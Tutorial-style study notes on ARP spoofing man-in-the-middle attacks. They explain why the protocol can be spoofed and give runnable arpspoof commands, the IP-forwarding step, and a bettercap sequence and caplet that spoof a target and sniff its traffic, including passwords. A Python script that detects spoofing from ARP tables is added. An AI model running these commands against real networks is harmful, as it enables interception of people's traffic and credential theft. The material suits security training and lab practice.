====== ARP Spoofing ======
This is a MITM attack...
Test site: http://testphp.vulnweb.com/
===== ARP Tables =====
To check the ARP table on Windows or Linux: ''arp -a''
If you get too many entries, filter it (Linux):
<code bash>
arp -a | grep ether
</code>
----
===== ARP Spoofing Attack =====
**Terms:**
* __ARP__: Address Resolution Protocol (maps IP to MAC on a network)
* __ARP Request__: broadcast to the network requesting MAC of specific IP
* __ARP Response__: client with that IP responds to requester with its MAC address
Each computer on the network has an ARP table linking IPs with MACs. You use this table to exploit the ARP protocol and set up a MITM spoof.
- You spoof the IP/MAC of the router and send it to the victim. This causes the victim to update its ARP table and associate your MAC with the router's IP.
- You spoof the IP/MAC of the victim and send it to the router. This causes the router to update its ARP table and associate your MAC with the victim's IP.
This effectively puts you in the middle, intercepting traffic between victim and router. The victim thinks you are the router; and the router thinks you are the victim.
**Why ARP Spoofing works:** Because the protocol itself is not secure...
- Clients accept responses even if they did not send a request.
- Clients trust responses without any verification.
So you send an ARP response to a target; the target does not verify it and simply updates its ARP table with the response you sent.
**Tools:** arpspoof, bettercap
* These tools only set up the ARP spoof and redirect traffic to your computer (they put you in the middle).
* After you set this up, you need to capture and analyze the traffic (with something like Wireshark).
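Because nothing on the wire announces the spoof, the practical check is the ARP table itself. The following added example (not from the original notes or from the tools above) parses Linux ''arp -a'' output and flags the two symptoms these notes describe: the gateway's MAC differing from a pinned baseline, and one MAC claiming several IPs. The sample output, the gateway address and the baseline MAC are constructed.

```python
import re
from collections import defaultdict

# Matches resolved entries in Linux `arp -a` output, e.g.
#   ? (192.168.0.1) at aa:bb:cc:dd:ee:ff [ether] on eth0
# Unresolved entries ("<incomplete>") do not match and are skipped.
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return {ip: mac} (MACs lower-cased) from `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def detect_spoof(table, gateway_ip, known_gateway_mac):
    """Return findings for the two ARP-cache symptoms of a spoof."""
    findings = []
    # Symptom 1: the gateway IP no longer resolves to its pinned MAC.
    seen = table.get(gateway_ip)
    if seen and seen != known_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} resolves to {seen}, expected {known_gateway_mac.lower()}")
    # Symptom 2: one MAC answers for several IPs (its own and the one it impersonates).
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings

# Constructed sample of a victim's cache mid-spoof; 192.168.0.100 is the hypothetical attacker's real address.
SAMPLE_ARP_OUTPUT = """\
? (192.168.0.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.0.100) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.0.50) at de:ad:be:ef:00:50 [ether] on eth0
? (192.168.0.77) at <incomplete> on eth0
"""
PINNED_GATEWAY_MAC = "aa:bb:cc:dd:ee:01"  # constructed baseline, recorded on a clean network

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_OUTPUT)
    for finding in detect_spoof(table, "192.168.0.1", PINNED_GATEWAY_MAC):
        print("ALERT:", finding)
```

Run it periodically against live ''arp -a'' output with a baseline recorded while the network is known-good; a static ARP entry for the gateway is the matching mitigation on hosts that allow it.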
----
===== arpspoof =====
Syntax (usage is always the same):
<code bash>
arpspoof -i [interface] -t [clientIP] [gatewayIP]   # spoofs the client, telling it you are the gateway
arpspoof -i [interface] -t [gatewayIP] [clientIP]   # spoofs the gateway, telling it you are the client
</code>
Example (as root):
<code bash>
arpspoof -i eth0 -t 192.168.0.216 192.168.0.1
arpspoof -i eth0 -t 192.168.0.1 192.168.0.216
</code>
NOTE: You need to enable IP forwarding so packets flow through your machine just like a router (without it, the victim's packets stop at your machine and it loses connectivity).
* As root: ''echo 1 > /proc/sys/net/ipv4/ip_forward''
----
===== Bettercap =====
Bettercap can do the same thing as arpspoof and more: [[https://www.bettercap.org/modules/ethernet/|docs]].
Bettercap is a framework to run network attacks:
* ARP Spoofing (redirect flow of packets through your machine to analyze, change)
* Sniff data (urls, usernames, passwords)
* Bypass HTTPS
* DNS Spoofing (redirect domain requests)
* Inject code in loaded pages
**Syntax:** ''bettercap -iface [interface]''
That gets you into the tool. Type ''help'' to see a menu and ''help [moduleName]'' to get help on the specific module you want to use.
* At the top of the help information you get the syntax to turn the module on/off, etc.
* Under that you get Parameters (options for the module). To change one:
  * Syntax: ''set [option to modify] [value]'' (''true'' or ''false'' for boolean options)
  * Example: ''set arp.spoof.fullduplex true''
**Module: net.probe** (discover connected clients quickly)
* Turn the module on (at bettercap prompt): ''net.probe on''
* This will also automatically start the net.recon module (type "help" at prompt to confirm)
**Module: net.recon**
* net.probe sends probe requests to all possible IPs on the network
* net.recon monitors the ARP cache, takes the responses and adds them to a list of hosts for you to target
* net.recon has several commands:
  * net.show: show the cached hosts list (default sorting by IP).
----
===== Bettercap ARP Spoof =====
Module: arp.spoof (for usage, at the bettercap prompt: ''help arp.spoof'')
* You MUST have net.probe and net.recon running for this to work.
1. Turn on net.probe if it's not on already:
<code>
net.probe on
</code>
2. Change the module parameter for full duplex (spoof client and router, both):
<code>
set arp.spoof.fullduplex true
</code>
3. Change the module parameter to add your target client IP (because we set the full-duplex parameter, we do not have to set the gateway, only the client; the gateway/router is set automagically):
<code>
set arp.spoof.targets [target IP]
# or several targets
set arp.spoof.targets [target IP],[target IP],[target IP]
</code>
4. Turn ARP spoofing on (see ''help arp.spoof'') and that's it:
<code>
arp.spoof on
help    # to see the modules running
</code>
NOTE: If you check the ARP table on the client you will see the attack machine's MAC associated with the gateway's IP.
5. To sniff the traffic (still using bettercap; later we'll use Wireshark):
<code>
help net.sniff   # see the options
net.sniff on
</code>
**Test It:** [[http://testphp.vulnweb.com/|VulnWeb]] (to generate some traffic)
----
===== Bettercap Caplets =====
Caplets are custom scripts for Bettercap (basically text files with commands, one on each line).
How-To:
- Create a text file
- On each line put the commands you always run
Example (to do all the above when you start Bettercap):
<code>
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.0.142
arp.spoof on
net.sniff on
</code>
To run it:
<code bash>
bettercap -iface [interface name] -caplet /path/to/caplet.cap
</code>
----